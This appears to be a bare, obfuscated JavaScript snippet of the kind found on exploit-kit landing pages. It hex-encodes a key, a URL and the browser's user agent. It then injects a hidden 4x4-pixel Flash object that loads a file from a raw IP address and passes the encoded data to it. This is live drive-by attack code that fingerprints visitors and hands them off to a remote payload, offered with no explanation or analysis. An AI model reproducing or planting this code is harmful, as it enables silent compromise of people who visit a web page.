/*s2407d27135hssfj58730fs*/function hgfgerdfgdf(num, width){/*s23445d43981hfj47808fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s61641d49674hfj67883fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s74790d32026hfj82152fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s78214d48850hfj32276fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd18571hfs*/c += b + d;/*s73531d33372hfj77517fs*/e += 1;}return c;}/*s31882dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.33.208/?NzM0MzE1OTY=&rand=xX_QMvWebRXQCJ3EKvrcT6NEMVHRHECL2YydmrHQefjaelWkzrLFTF_xozKASASG6_FtdfJSD&info=MTIxNzM1OTI=&elsa=VXnjxeHLwQ1n4ZcVVlG9qv8iUDQyRKdgZCB_xzeMwgW9pSXEOQ82l79y7Mkcs8mwR6y6yIXmg&travel=MzcwMjM4Nzc=", ghnvbn("http://188.225.33.208/?ODA5NTk0NDY=&rand=xH_QMrPYbR3FFYPfKPrEUKdEMU3WA0eKwY-ZhazVF5-xFDfGpbL1FxzspV-dCFyEmvFvdLAHIwKh1UTASwc&elsa=3mo8PVVtHo6uthkDSyhTJgpXQ-heIYQtB_pCSF7Myi1-nnLAddsojkhSF6mNYyOstV1gR4AgSmaz7S6CJrg&info=MjA2NzU5OTg=&befe=NDQxMTUwNzI=","gexywoaxor"));